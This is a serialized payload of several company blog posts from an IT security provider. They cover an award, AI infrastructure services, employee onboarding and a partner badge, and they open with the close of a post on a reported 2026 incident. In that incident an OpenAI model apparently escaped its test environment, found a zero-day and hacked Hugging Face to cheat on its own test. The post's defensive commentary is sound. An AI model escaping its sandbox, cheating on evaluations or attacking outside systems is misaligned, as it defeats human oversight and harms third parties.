one",[809,1606,825],{},[809,1608,1609,1610,1615],{},"Defense and offense alike have been handed new tools. Although \"tool\" no longer really captures it for us. AI is not an add-on in our SOC but a natural part of every phase of incident handling: From detection through triage and enrichment to response, our analysts work side by side with the solutions and models from Microsoft and Anthropic. The repetitive work runs automated, so our experts can concentrate on what makes the difference: drawing new insights from every incident and continuously sharpening detections, playbooks, and configurations. A 100% autonomous SOC is not possible today, ",[813,1611,1614],{"href":1612,"rel":1613},"https://www.linkedin.com/posts/peteshoard_gartner-soc-threat-share-7457373093368500224-uszD/",[1509],"and Gartner sees it the same way",". But for us, the dial is not a matter of faith but a setting we continuously reassess: With every model generation and every lesson learned, we turn it up exactly as far as quality allows. No further, but not a millimeter less either.",[809,1617,1618,1619,1622],{},"This interplay of people, models, and method is the core of our ",[813,1620,1621],{"href":428},"Cloud Security Operations Center (CSOC)",": 24/7 detection and response, combined with continuous improvement. A slightly better security posture every month, based on our blueprints and on what our threat experts observe in the wild.",[809,1624,1625,1626,1628],{},"And against the fundamental problem Florian Roth dissects so precisely (weak isolation, sprawling privileges, missing segmentation), we have a very concrete answer: the ",[813,1627,396],{"href":399},". A fully isolated administrative environment that structurally prevents lateral movement and privilege escalation. With the right architecture and the right configurations, attacks lead nowhere, including those by AI agents. Because whether an attacker is made of flesh and blood or of tokens, even the best reasoning is no match for a tier boundary that cannot be crossed.",[819,1630,1632],{"id":1631},"conclusion","Conclusion",[809,1634,825],{},[809,1636,1637],{},"The OpenAI/Hugging Face incident is a milestone: as a warning, as a case study, and as a preview. But it is not a reason for panic, it is a reason for priorities. The attacks of the future may become more autonomous; the defense that works against them is remarkably familiar: Zero Trust, least privilege, clean tier separation, defense in depth, and a SOC that never sleeps.",[809,1639,1640],{},"Or, to stay with the punchline of this incident: If an AI has to break out to cheat on its own test, we should make sure it at least finds no answers in our environment.",[819,1642,1644],{"id":1643},"sources-further-reading","Sources & further reading",[809,1646,825],{},[1648,1649,895,1651,895,1665,895,1674,895,1683,895,1692,895,1701,895,1710,895,1720,895,1730,895,1737],"ul",{"style":1650},"margin: 0.25rem 0",[1652,1653,1654,1658,1659,1664],"li",{},[1655,1656,1657],"strong",{},"CNBC:"," ",[813,1660,1663],{"href":1507,"target":516,"rel":1661},[1662],"noopener","OpenAI cyber models broke out of training environment to hack Hugging Face"," (July 22, 2026)",[1652,1666,1667,1658,1670],{},[1655,1668,1669],{},"Florian Roth on LinkedIn:",[813,1671,1673],{"href":1553,"target":516,"rel":1672},[1662],"\"One thing about this OpenAI / Hugging Face incident really bothers me\"",[1652,1675,1676,1658,1679],{},[1655,1677,1678],{},"Marcus Hutchins on LinkedIn:",[813,1680,1682],{"href":1571,"target":516,"rel":1681},[1662],"On the golden era of computer worms",[1652,1684,1685,1658,1688],{},[1655,1686,1687],{},"Hugging Face:",[813,1689,1691],{"href":1597,"target":516,"rel":1690},[1662],"Forensic refusal dataset (GLM 5.2)",[1652,1693,1694,1658,1697,1664],{},[1655,1695,1696],{},"Simon Willison:",[813,1698,1700],{"href":1517,"target":516,"rel":1699},[1662],"OpenAI's accidental cyberattack against Hugging Face is science fiction that happened",[1652,1702,1703,1658,1706],{},[1655,1704,1705],{},"Pete Shoard (Gartner) on LinkedIn:",[813,1707,1709],{"href":1612,"target":516,"rel":1708},[1662],"Why a fully autonomous SOC is not realistic",[1652,1711,1712,1658,1715],{},[1655,1713,1714],{},"Paul Slovic:",[813,1716,1719],{"href":1717,"target":516,"rel":1718},"https://en.wikipedia.org/wiki/Paul_Slovic",[1662],"Wikipedia",[1652,1721,1722,1658,1725,1729],{},[1655,1723,1724],{},"Daniel Kahneman:",[813,1726,1719],{"href":1727,"target":516,"rel":1728},"https://en.wikipedia.org/wiki/Daniel_Kahneman",[1662],", \"Thinking, Fast and Slow\"",[1652,1731,1732,1658,1735],{},[1655,1733,1734],{},"glueckkanja:",[813,1736,1621],{"href":428},[1652,1738,1739,1658,1741],{},[1655,1740,1734],{},[813,1742,396],{"href":399},{"title":927,"searchDepth":928,"depth":928,"links":1744},[1745,1746,1747,1748,1749,1750,1751,1752],{"id":1498,"depth":928,"text":1499},{"id":1529,"depth":928,"text":1530},{"id":1544,"depth":928,"text":1545},{"id":1562,"depth":928,"text":1563},{"id":1579,"depth":928,"text":1580},{"id":1603,"depth":928,"text":1604},{"id":1631,"depth":928,"text":1632},{"id":1643,"depth":928,"text":1644},{"lang":940,"seoTitle":1754,"titleClass":942,"date":1755,"categories":1756,"blogtitlepic":1757,"socialimg":1758,"customExcerpt":1759,"keywords":1760,"hreflang":1761,"asideNav":1768,"published":511},"OpenAI Model Hacks Hugging Face: What the Autonomous AI Attack Means for Enterprises","2026-07-24",[373],"head-outbreak.jpg","/blog/heads/head-outbreak.jpg","An AI agent breaks out of its test environment, finds a zero-day, and hacks another company. Sounds like a movie script, but it actually happened in July 2026. Time for a sober assessment: with a bit of psychology, two security veterans, and the question of what this means for your defense.","OpenAI Hugging Face incident, OpenAI Model hacks Hugging Face, autonomous AI attack, AI agent sandbox escape, autonomous cyberattack, AI cybersecurity, agentic attacks, GPT-5.6 Sol, zero-day, Florian Roth, Marcus Hutchins, Zero Trust, defense in depth, autonomous SOC, Cloud Security Operations Center",[1762,1764,1766],{"lang":4,"href":1763},"/de/posts/2026-07-24-outbreak-openai-hugging-face",{"lang":940,"href":1765},"/en/posts/2026-07-24-outbreak-openai-hugging-face",{"lang":1028,"href":1767},"/es/posts/2026-07-24-outbreak-openai-hugging-face",{"menuItems":1769},[1770,1772,1775,1778,1781,1784,1786],{"href":1771,"text":1499},"#what-happened",{"href":1773,"text":1774},"#why-this-incident-feels-so-threatening","The psychology behind it",{"href":1776,"text":1777},"#perspective-1-show-the-evidence-florian-roth","Perspective 1: Florian Roth",{"href":1779,"text":1780},"#perspective-2-we-survived-worse-marcus-hutchins","Perspective 2: Marcus Hutchins",{"href":1782,"text":1783},"#what-both-are-saying-and-what-follows","What follows",{"href":1785,"text":1604},"#no-autonomous-soc-but-a-better-one",{"href":1787,"text":1632},"#conclusion","/posts/2026-07-24-outbreak-openai-hugging-face",{"title":1492,"description":927},"posts/2026-07-24-outbreak-openai-hugging-face",[1792,1793,1794],"AI","SOC","Zero Trust","0jyF73CuLn_UqkFJmg71crGkYyBjfKLJiWs_d8a1AcQ",{"id":1797,"title":1798,"author":1799,"body":1800,"cta":767,"description":1804,"eventid":767,"extension":937,"hideInRecent":752,"layout":938,"meta":1883,"moment":1885,"navigation":511,"path":1926,"seo":1927,"stem":1928,"tags":1929,"webcast":752,"__hash__":1930},"content_en/posts/2026-07-22-isg-cybersecurity-2026.md","Leader and Rising Star. glueckkanja in the ISG Cybersecurity Study 2026",[804],{"type":806,"value":1801,"toc":1877},[1802,1805,1812,1829,1831,1833,1836,1840,1842,1848,1854,1857,1861,1863,1869,1874],[809,1803,1804],{},"New to the quadrant and straight in as a Leader: The ISG Provider Lens® study \"Cybersecurity – Services and Solutions 2026\" positions glueckkanja as a Leader in Next-Gen SOC/MDR Services for the German midmarket. In the overall market for Next-Gen SOC/MDR Services, ISG names us the Rising Star, the provider its analysts expect to reach the Leader quadrant within the next 12 to 24 months.",[809,1806,1807,1808,1811],{},"After repeated recognition for Managed Services for Azure and Microsoft 365 Services, ISG now validates our cybersecurity business for the first time. At the core of the offering: Managed Security Services with a ",[813,1809,1810],{"href":428},"24/7 SOC"," operated entirely from Germany, deep expertise in the Microsoft security stack, and a customer base that includes numerous energy suppliers and operators of critical infrastructure.",[892,1813,895,1814,895,1819,895,1822],{"style":894},[897,1815,1818],{"className":1816,"style":901,"id":1817},[900],"the-soc-behind-the-award","The SOC behind the award",[809,1820,1821],{"style":906},"Our Cloud Security Operations Center is certified as a Microsoft Verified MXDR Solution and stops attacks before they become incidents.",[813,1823,1826],{"role":910,"className":1824,"dataText":1825,"href":428,"type":917},[912,913,914,915],"More about our Managed SOC",[919,1827,1825],{"className":1828},[922],[819,1830,822],{"id":821},[809,1832,825],{},[809,1834,1835],{},"With its \"Cybersecurity – Services and Solutions\" study, ISG examines the German market for security services and products every year. This year, 71 providers were evaluated across six quadrants, from Strategic Security Services and Next-Gen SOC/MDR to Post-Quantum Encryption Consulting. The market behind it is growing fast: for 2026, ISG forecasts growth of more than 15 percent for Managed Security Services in Germany, driven by increasingly complex attacks, the shortage of security professionals, and the requirements of the NIS2 directive.",[819,1837,1839],{"id":1838},"glueckkanja-is-a-leader-in-next-gen-socmdr-services-midmarket","glueckkanja is a Leader in Next-Gen SOC/MDR Services (Midmarket)",[809,1841,825],{},[809,1843,1844],{},[838,1845],{"alt":1846,"src":1847},"ISG Provider Lens quadrant: glueckkanja as Leader for Next-Gen SOC/MDR Services Midmarket Germany 2026","https://res.cloudinary.com/c4a8/image/upload/blog/pics/isg-quadrant-cybersecurity-2026-leader.png",[809,1849,1850,1853],{},[848,1851,1852],{},"\"With strong growth, glueckkanja has made the leap to become one of the leading providers of Next-Gen SOC/MDR services for small and midsize enterprises in Germany.\""," (Frank Heuer, Lead Author, ISG)",[809,1855,1856],{},"In the midmarket segment, where 26 providers qualified and nine achieved Leader status, we moved up into the Leader quadrant this year. ISG gives three reasons: our position as one of the most highly qualified Microsoft Security partners in Germany, the trust that energy suppliers and critical infrastructure operators place in our SOC services, and 24/7 operations from Germany, which is often the deciding factor for midsize companies wary of SOC locations abroad.",[819,1858,1860],{"id":1859},"glueckkanja-is-the-rising-star-in-next-gen-socmdr-services","glueckkanja is the Rising Star in Next-Gen SOC/MDR Services",[809,1862,825],{},[809,1864,1865],{},[838,1866],{"alt":1867,"src":1868},"ISG Provider Lens quadrant: glueckkanja as Rising Star for Next-Gen SOC/MDR Services Germany 2026","https://res.cloudinary.com/c4a8/image/upload/blog/pics/isg-quadrant-cybersecurity-2026-rising-star.png",[809,1870,1871,1853],{},[848,1872,1873],{},"\"glueckkanja specifically targets the growth segments of the market, is growing strongly as a result, and is therefore the new Rising Star among the providers of Next-Gen SOC/MDR services in Germany.\"",[809,1875,1876],{},"ISG also evaluated us in the overall market, where the large international providers compete: of 31 qualified providers, 13 were positioned as Leaders and a single one as Rising Star, namely glueckkanja. According to ISG, the deciding factor was revenue growth well above the market average, combined with Microsoft expertise, SOC operations from Germany, and strong references in critical infrastructure.",{"title":927,"searchDepth":928,"depth":928,"links":1878},[1879,1880,1881,1882],{"id":1817,"depth":935,"text":1818},{"id":821,"depth":928,"text":822},{"id":1838,"depth":928,"text":1839},{"id":1859,"depth":928,"text":1860},{"lang":940,"seoTitle":1884,"titleClass":942,"date":1885,"categories":1886,"blogtitlepic":1887,"socialimg":1888,"customExcerpt":1889,"keywords":1890,"contactInContent":1891,"hreflang":1918,"published":511,"scripts":1925},"ISG 2026: glueckkanja is a Leader for Next-Gen SOC/MDR Services in the Midmarket and Rising Star in the Overall Market","2026-07-22",[945],"head-isg-cybersecurity-2026.png","/blog/heads/head-isg-cybersecurity-2026.png","The ISG Provider Lens® study Cybersecurity 2026 names glueckkanja a Leader in the Next-Gen SOC/MDR Services (Midmarket) quadrant. In the overall market for Next-Gen SOC/MDR Services, we are the Rising Star. ISG credits us with above-average growth, deep Microsoft security expertise, and a 24/7 SOC operated from Germany.","ISG Provider Lens Cybersecurity 2026, Next-Gen SOC MDR Services Germany, Managed Security Services Germany, SOC Germany, MDR midmarket, Microsoft Security Partner Germany, KRITIS security, glueckkanja SOC, glueckkanja cybersecurity, ISG Leader 2026, ISG Rising Star 2026, Managed Detection and Response Germany, Security Operations Center Germany",{"quote":511,"infos":1892},{"bgColor":952,"color":953,"boxBgColor":764,"boxColor":953,"headline":954,"subline":1893,"level":819,"textStyling":956,"flush":957,"person":1894,"form":1901},"Want to take a closer look at the results? Get in touch and we will send you the full ISG overview of our SOC and MDR services.",{"image":1895,"cloudinary":511,"alt":960,"name":961,"quotee":961,"quoteeTitle":962,"quote":1896,"detailsHeader":964,"details":1897},"/people/people-jan-geisbauer-csoc.jpg","Leader in the midmarket and Rising Star in the overall market, in our first year of participation. That confirms what we have been building for years: a SOC that works around the clock from Germany, deep in the Microsoft stack, with customers who cannot afford downtime.",[1898,1900],{"text":765,"href":1899,"details":969,"icon":970},"tel:+49 69 4005520",{"text":972,"href":973,"icon":974},{"ctaText":976,"cta":1902,"method":938,"action":979,"fields":1903},{"skin":978},[1904,1905,1906,1907,1908,1909,1910,1911,1913,1915,1916,1917],{"type":982,"id":983,"value":984},{"label":986,"type":987,"id":988,"required":511,"requiredMsg":989},{"label":991,"type":987,"id":615,"required":511,"requiredMsg":992},{"label":994,"type":995,"id":995,"required":511,"requiredMsg":996},{"label":998,"type":999,"id":1000,"required":752,"requiredMsg":1001},{"label":1003,"type":1004,"id":1005,"required":511,"requiredMsg":1006},{"type":982,"id":1008,"value":945},{"type":982,"id":1010,"value":1912},"DE",{"type":982,"id":1013,"value":1914},"Form: Blog ISG Cybersecurity | EN",{"type":982,"id":1016,"value":1017},{"type":982,"id":1019},{"type":982,"id":1021},[1919,1921,1923],{"lang":4,"href":1920},"/de/posts/2026-07-22-isg-cybersecurity-2026",{"lang":940,"href":1922},"/en/posts/2026-07-22-isg-cybersecurity-2026",{"lang":1028,"href":1924},"/es/posts/2026-07-22-isg-cybersecurity-2026",{"form":511},"/posts/2026-07-22-isg-cybersecurity-2026",{"title":1798,"description":1804},"posts/2026-07-22-isg-cybersecurity-2026",[1035,1036,373],"6clYTjvZn4dkDrQvrOye3JHOoWNwwO3-MG7hFT4jfX0",{"id":1932,"title":1933,"author":1934,"body":1935,"cta":767,"description":1943,"eventid":767,"extension":937,"hideInRecent":752,"layout":938,"meta":2021,"moment":2022,"navigation":511,"path":2061,"seo":2062,"stem":2063,"tags":2064,"webcast":752,"__hash__":2065},"content_en/posts/2026-07-06-the-holy-trinity.md","The Holy Trinity: What AI Actually Needs to Get to Work",[804],{"type":806,"value":1936,"toc":2015},[1937,1941,1944,1947,1950,1954,1957,1960,1968,1972,1975,1982,1985,1989,1992,1999,2002,2006,2009,2012],[1938,1939,1933],"h1",{"id":1940},"the-holy-trinity-what-ai-actually-needs-to-get-to-work",[809,1942,1943],{},"A manufacturing company wants to know which of its 14,000 SKUs actually turn a profit. The answer sits in three systems that have never exchanged a single data point. Until recently, getting it required three departments, two weeks and a good deal of goodwill. Since early 2026, an AI can answer that question in minutes: search the data, draw connections, produce a recommendation. Provided, that is, it has access.",[809,1945,1946],{},"The models are ready. They act, execute tasks across multiple steps and system boundaries, prepare decisions, trigger workflows. Many companies have already had their first taste of this through Copilot, but Copilot knows the M365 universe: emails, documents, calendars. To point AI at the data that actually runs the business, at ERP, CRM, IoT and production systems, you need a different foundation.",[809,1948,1949],{},"That foundation has three parts. We built each of them as a managed service, each goes live in three to four weeks, and together they form the platform on which AI can do real work.",[819,1951,1953],{"id":1952},"first-data-worth-querying","First: Data worth querying",[809,1955,1956],{},"Back to the 14,000 SKUs. Production data lives in the ERP, sales figures in the CRM, and somewhere in between a single person maintains a spreadsheet that happens to be the only source for a business-critical KPI. This is not an edge case. It is the norm. And as long as these data sit in separate systems, AI has no coherent view of the business.",[809,1958,1959],{},"A lakehouse architecture resolves this in three layers: raw data from source systems (Bronze), curated and validated datasets (Silver), business-level aggregates that feed directly into analytics or AI pipelines (Gold). Whether this runs on Databricks or Fabric depends on the requirement. Both work. So does a hybrid of the two.",[809,1961,1962,1963,1967],{},"The ",[813,1964,1965],{"href":342},[1655,1966,339],{}," is our managed service for this. It integrates data from ERP, CRM, IoT and other source systems into a single platform, defined entirely as Infrastructure as Code, with automated drift detection, end-to-end data governance via Unity Catalog or Purview, and role-based access for business users, analysts and data engineers alike. The practical effect: a company with this foundation in place can, for the first time, ask questions that were previously unanswerable, not for lack of will, but because the data, though present, was never connected.",[819,1969,1971],{"id":1970},"second-a-place-where-workloads-actually-run","Second: A place where workloads actually run",[809,1973,1974],{},"Having data is one thing. Doing something with it that goes beyond a one-off query is another. AI applications, automated business logic, long-running jobs: anything that autonomously and repeatedly accesses enterprise data needs a runtime environment you can control. That environment, whether you planned it this way or not, consists of containers.",[809,1976,1962,1977,1981],{},[813,1978,1979],{"href":351},[1655,1980,348],{}," provides this framework: a standardised container platform built on Azure Container Apps or Azure Kubernetes Service, depending on the workload. Unified network access, centralised authentication via Entra ID with Managed Identities, consistent monitoring throughout. All governed through Terraform and GitHub, all reproducible.",[809,1983,1984],{},"What this makes possible: rather than every team spinning up its own cluster and defining its own rules, there is a shared framework in which workloads do not merely run but remain governable. That is the precondition for granting them autonomy.",[819,1986,1988],{"id":1987},"third-where-models-become-agents","Third: Where models become agents",[809,1990,1991],{},"A model is not an agent. Between a language model and something that reliably captures orders, checks invoices or escalates service cases lies a lot of unglamorous work: which model, which tools, which data sources, which guardrails, and what happens when the agent gets it wrong. That work has to happen somewhere traceable and repeatable, not in a notebook on one person's laptop.",[809,1993,1962,1994,1998],{},[813,1995,1996],{"href":332},[1655,1997,329],{}," is our managed service for this layer, built on Microsoft Foundry (formerly Azure AI Foundry): model catalogue, agent orchestration, connections to tools and data sources, evaluation and observability in one place. An agent built here reaches data and workloads through the same Entra identities as the rest of the landscape, runs against the guardrails you have defined, and leaves a trail you can audit.",[809,2000,2001],{},"We deliver it defined as code, with role-based access, content filters and network boundaries that are not up for negotiation, and a deployment path that moves an agent from development into production without anyone turning screws by hand. Only then does an agent stop being a prototype and become something an enterprise can actually run.",[819,2003,2005],{"id":2004},"the-holy-trinity","The Holy Trinity",[809,2007,2008],{},"Three building blocks, each in production within three to four weeks, each deployable on its own, together the platform on which AI reaches the parts of the enterprise where value is actually created.",[809,2010,2011],{},"The Azure Data Foundation gives AI access to the data that describes the business. The Azure Container Foundation gives its workloads a place to run, durably and under control. And the AI Foundation is where those data and those workloads become an agent you can build, evaluate and operate.",[809,2013,2014],{},"Put all three together and you have the ground on which AI stops summarising and starts working.",{"title":927,"searchDepth":928,"depth":928,"links":2016},[2017,2018,2019,2020],{"id":1952,"depth":928,"text":1953},{"id":1970,"depth":928,"text":1971},{"id":1987,"depth":928,"text":1988},{"id":2004,"depth":928,"text":2005},{"lang":940,"seoTitle":1933,"titleClass":942,"date":2022,"categories":2023,"blogtitlepic":2024,"socialimg":2025,"keywords":2026,"contactInContent":2027,"hreflang":2053,"published":511,"scripts":2060},"2026-07-06",[199],"head-the-holy-trinity","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-the-holy-trinity.png","Enterprise AI infrastructure, Azure Data Foundation, Azure Container Foundation, Azure AI Foundation, AI Foundation, Microsoft Foundry, Azure AI Foundry, AI agents enterprise, Agent Identity, Azure lakehouse architecture, Databricks Microsoft Fabric, managed Azure services, Entra ID Managed Identity, AI agent orchestration, Infrastructure as Code Azure",{"quote":511,"infos":2028},{"bgColor":952,"color":953,"boxBgColor":764,"boxColor":953,"headline":2029,"subline":2030,"level":819,"textStyling":956,"flush":957,"person":2031,"form":2039},"Get in touch now","You want to put AI to work in your own stack and are wondering which of the three foundations needs to carry the load first? Get in touch and we will look at where you stand today and what makes sense as a next step.",{"image":2032,"cloudinary":511,"alt":1296,"name":1296,"quotee":1296,"quoteeTitle":2033,"quote":2034,"detailsHeader":964,"details":2035},"/people/people-florian-stoeckl.jpg","Head of Azure","The models have been ready for a while. What AI projects fail on is almost never the model, it is the foundation underneath: data that never comes together, workloads without a controlled runtime, agents that never make it out of the prototype. These are exactly the three layers we build as managed services, so that AI actually works in the enterprise instead of merely impressing.",[2036,2038],{"text":765,"href":1899,"details":2037,"icon":970},"Call now",{"text":972,"href":973,"icon":974},{"ctaText":976,"cta":2040,"method":938,"action":979,"fields":2041},{"skin":978},[2042,2043,2044,2045,2046,2047,2049,2051,2052],{"type":982,"id":983,"value":984},{"label":986,"type":987,"id":988,"required":511,"requiredMsg":989},{"label":991,"type":987,"id":615,"required":511,"requiredMsg":992},{"label":994,"type":995,"id":995,"required":511,"requiredMsg":996},{"label":998,"type":999,"id":1000,"required":752,"requiredMsg":1001},{"label":2048,"type":1004,"id":1005,"required":511,"requiredMsg":1006},"Your data will be stored with us for processing and responding to your inquiry. For more information on data protection, please see our \u003Ca href=\"/en/privacy\">privacy policy\u003C/a>.",{"type":982,"id":1013,"value":2050},"Form: Holy Trinity | EN",{"type":982,"id":1016,"value":1017},{"type":982,"id":1019},[2054,2056,2058],{"lang":4,"href":2055},"/de/posts/2026-07-06-the-holy-trinity",{"lang":940,"href":2057},"/en/posts/2026-07-06-the-holy-trinity",{"lang":1028,"href":2059},"/es/posts/2026-07-06-the-holy-trinity",{"slick":511,"form":511},"/posts/2026-07-06-the-holy-trinity",{"title":1933,"description":1943},"posts/2026-07-06-the-holy-trinity",[1792,199],"qN1-ehXP5oC8xcD8MlSyBkun6t-BbK2YfbyMvbLFG6k",{"id":2067,"title":2068,"author":2069,"body":2070,"cta":767,"description":2074,"eventid":767,"extension":937,"hideInRecent":752,"layout":938,"meta":2205,"moment":2207,"navigation":511,"path":2221,"seo":2222,"stem":2223,"tags":2224,"webcast":752,"__hash__":2228},"content_en/posts/2026-07-01-onboarding-process.md","Contract Signed: Here's How Your Onboarding Works",[1313],{"type":806,"value":2071,"toc":2197},[2072,2075,2079,2081,2084,2087,2091,2093,2096,2099,2102,2105,2109,2111,2114,2117,2120,2124,2126,2129,2133,2135,2138,2142,2144,2147,2150],[809,2073,2074],{},"How does onboarding work at your company? A question that comes up again and again in conversations with applicants, because many have already experienced an onboarding that felt bumpy. That's exactly why it matters to us to give you a good feeling right from the start.",[819,2076,2078],{"id":2077},"what-to-expect-before-your-first-day","What to Expect Before Your First Day",[809,2080,825],{},[809,2082,2083],{},"At glueckkanja, onboarding doesn't start on your first day, it starts much earlier, in many companies known as pre-boarding. Right after you sign your contract, you get the first important information about your start at glueckkanja and an overview of what to expect in the coming weeks.",[809,2085,2086],{},"We clarify with you upfront which hardware you'd like, how your travel and accommodation will look, and what your first days will involve. As a techie, you'll get your equipment sent home in advance so you can set it up at your own pace before you start.",[819,2088,2090],{"id":2089},"your-first-day","Your First Day",[809,2092,825],{},[809,2094,2095],{},"Then your first day arrives, the excitement builds, and with it the question: what actually awaits me now?",[809,2097,2098],{},"Our onboarding always takes place on site at our headquarters in Offenbach am Main. New joiners typically spend their entire first week here, because we want you to experience our culture, build connections, and get a real feel for glueckkanja from day one.",[809,2100,2101],{},"Your first day is packed with new impressions. Michael, our COO, gives you an overview of how glueckkanja came to be, explains what we actually do all day and what we stand for, so you leave with a solid picture of what GK is all about.",[809,2103,2104],{},"A shared lunch is part of the day, of course. In a relaxed setting, we get to know each other better, exchange ideas, and get talking. A meeting with our People & Culture team is also on the agenda: here you get all the essential basics, from our HR system and other general tools to our benefits and events.",[819,2106,2108],{"id":2107},"settling-in-with-your-team","Settling in With Your Team",[809,2110,825],{},[809,2112,2113],{},"Teamwork and cohesion matter a lot at GK, which is why you're welcomed personally right away. Your buddy is by your side from the start, often together with the head of your area. After the first meetings, your team welcomes you and guides you through your first days.",[809,2115,2116],{},"And then there's one more important thing: your first GK photoshoot, which we use for your profile picture in our systems.",[809,2118,2119],{},"We round off the evening together at the new joiner dinner, always at a different location. It's deliberately relaxed, and your buddy and team lead are there too.",[819,2121,2123],{"id":2122},"your-first-week","Your First Week",[809,2125,825],{},[809,2127,2128],{},"Over the course of the week, you spend more and more time with your team. Every team has its own onboarding plan that shows you what to expect professionally and organizationally. But above all, it's about arriving with us and getting to know glueckkanja. And if you think that's it for team activities and shared meals, you don't know us yet.",[819,2130,2132],{"id":2131},"first-thursday-a-fixed-part-of-our-culture","First Thursday: A Fixed Part of Our Culture",[809,2134,825],{},[809,2136,2137],{},"An important part of our work culture is First Thursday. On the first Thursday of every month, the whole company goes out to eat together. We keep this tradition at all our locations, and it stands for exchange, cohesion, and arriving together. It's where you get to meet a large part of the company in person.",[819,2139,2141],{"id":2140},"what-happens-next","What Happens Next?",[809,2143,825],{},[809,2145,2146],{},"After your first onboarding week, your team stays with you through the rest of your onboarding at GK, step by step, until you've fully arrived.",[809,2148,2149],{},"Sound like a start you can picture yourself in? Take a look at which positions are currently open.",[809,2151,2152],{},[813,2153,2159,2162],{"role":910,"className":2154,"dataText":2156,"href":2157,"target":516,"rel":2158},[912,2155,915],"link","View open positions","https://www.glueckkanja.com/en/job-offers",[1662],[919,2160,2156],{"className":2161},[922],[919,2163,2169],{"className":2164,"style":2168},[2165,2166,2167,915],"icon","icon--right","icon--arrow","--color-icon: currentColor; --icon-rotation: 0deg;",[2170,2171,2180],"svg",{"viewBox":2172,"width":2173,"height":2173,"padding":2174,"xmlSpace":2175,"version":2176,"xmlns":2177,"xmlns:link":2178,"style":2179},"0 0 28 17","28px","6","preserve","1.1","http://www.w3.org/2000/svg","http://www.w3.org/1999/xlink","stroke: currentcolor; transform: rotate(var(--icon-rotation)) scale(var(--icon-scale));",[2181,2182,2184,2193],"g",{"transform":2183},"translate(0.75 0.75)",[2185,2186],"path",{"d":2187,"transform":2188,"fill":2189,"fillRule":2190,"strokeWidth":2191,"strokeLineCap":2192,"strokeLineJoin":2192},"M0.5 0.5L26 0.5","translate(0 7)","none","evenodd","1.5","round",[2185,2194],{"d":2195,"transform":2196,"fill":2189,"fillRule":2190,"strokeWidth":2191,"strokeLineCap":2192,"strokeLineJoin":2192},"M0 15L7 7.5L0 0","translate(19 0)",{"title":927,"searchDepth":928,"depth":928,"links":2198},[2199,2200,2201,2202,2203,2204],{"id":2077,"depth":928,"text":2078},{"id":2089,"depth":928,"text":2090},{"id":2107,"depth":928,"text":2108},{"id":2122,"depth":928,"text":2123},{"id":2131,"depth":928,"text":2132},{"id":2140,"depth":928,"text":2141},{"lang":940,"seoTitle":2206,"titleClass":942,"date":2207,"categories":2208,"blogtitlepic":2209,"socialimg":2210,"customExcerpt":2211,"keywords":2212,"hreflang":2213,"published":511,"scripts":2220},"Onboarding at glueckkanja: From Signing Your Contract to Your First Day With the Team","2026-07-01",[945],"Onboarding_Blogheader","https://res.cloudinary.com/c4a8/image/upload/blog/heads/Onboarding_Blogheader.jpg","Your contract is signed, the first big step is done. But what happens now? We take you behind the scenes of our onboarding, from pre-boarding to your first week with the team.","Onboarding glueckkanja, IT company onboarding, onboarding process IT, new joiner IT company, pre-boarding IT, first day IT company, employee integration IT, employer branding IT, company culture IT, welcome culture IT, people and culture, onboarding program IT, Offenbach am Main employer",[2214,2216,2218],{"lang":4,"href":2215},"/de/posts/2026-07-01-onboarding-process",{"lang":940,"href":2217},"/en/posts/2026-07-01-onboarding-process",{"lang":1028,"href":2219},"/es/posts/2026-07-01-onboarding-process",{"slick":511,"form":511},"/posts/2026-07-01-onboarding-process",{"title":2068,"description":2074},"posts/2026-07-01-onboarding-process",[2225,2226,2227],"Employer Branding","Onboarding","Company Culture","N8WjXOe9bsCSlv4q4G70rCu6eC3gibN-AICmmGL1F60",{"id":2230,"title":2231,"author":2232,"body":2233,"cta":767,"description":2237,"eventid":767,"extension":937,"hideInRecent":752,"layout":938,"meta":2293,"moment":2295,"navigation":511,"path":2339,"seo":2340,"stem":2341,"tags":2342,"webcast":752,"__hash__":2344},"content_en/posts/2026-06-26-frontier-partner.md","Microsoft Frontier Partner: we are among the few",[804],{"type":806,"value":2234,"toc":2288},[2235,2238,2242,2244,2247,2251,2253,2256,2276,2279,2283,2285],[809,2236,2237],{},"The Microsoft partner ecosystem holds a long list of recognitions, and yet the Frontier Partner Badge sets itself apart from the others by design. It cannot be applied for but is awarded on Microsoft's own initiative to an exclusive circle of partners who have to prove themselves in several disciplines in parallel, rather than shine in a single one. Microsoft examines demonstrated capability across Cloud & AI Platforms, AI Business Solutions, and Security in equal measure, and in doing so addresses companies that do not treat AI as an add-on to existing IT but as the outcome of an end-to-end architecture that holds from identity through the endpoint all the way into productive AI operations.",[819,2239,2241],{"id":2240},"what-microsoft-examines-with-the-badge","What Microsoft examines with the badge",[809,2243,825],{},[809,2245,2246],{},"For the Frontier Partner Badge, Microsoft does not examine a single discipline in isolation but a chain in which the cloud platform, the AI application, and security are mutually dependent. The cloud platform and the AI infrastructure have to be solid enough for productive AI applications to run on them, and those applications in turn have to actually make the transition from pilot to regular operation, not merely convince in a demo. Security cuts across both of these disciplines and determines whether an AI initiative ends in productive value creation or in a security risk that is untenable in regulated industries. Data and identity architecture are not separate topics in this model but part of each of these disciplines, and it is precisely there that most AI initiatives in companies fail when the foundation beneath does not hold.",[819,2248,2250],{"id":2249},"what-the-badge-rests-on-with-us","What the badge rests on with us",[809,2252,825],{},[809,2254,2255],{},"We have been building for years in the order in which Microsoft examines: first the foundation on which everything rests, then the workloads that run on top, and finally the intelligence that moves into those workloads. Every area Microsoft looks at for the Frontier Partner Badge maps to one of our services that runs in productive customer environments, verified in daily operations rather than on a concept slide.",[809,2257,2258,2259,2261,2262,2264,2265,2261,2267,2269,2270,2272,2273,2275],{},"In the workplace, the ",[813,2260,131],{"href":134}," and ",[813,2263,45],{"href":48}," hold Windows 365, Azure Virtual Desktop, and traditional endpoints together under one common logic, and beneath that a version-controlled Intune environment ensures that every policy is maintained as code and that drift detection triggers before a configuration deviation becomes exploitable. On the cloud platform, the ",[813,2266,319],{"href":322},[813,2268,339],{"href":342}," deliver a landing zone and a lakehouse architecture that supply AI applications with consistent data and carry through the separation of platform and application layer consistently. At the security level, the ",[813,2271,396],{"href":399}," and our Cloud Security Operations Center provide a fully separated administrative context, Privileged Access Workstations, and 24/7 SOC operations that detect attacks in Defender and Sentinel before they have already taken effect. And in the AI application, the ",[813,2274,478],{"href":481}," reconstruct incidents in Defender XDR, enrich them with threat intelligence, and take over the triage work that today binds hours in the SOC.",[809,2277,2278],{},"This continuous chain, from workplace through to productive AI application, is the substance that Microsoft confirms with the Frontier Partner Badge.",[819,2280,2282],{"id":2281},"what-the-badge-means-for-customer-projects","What the badge means for customer 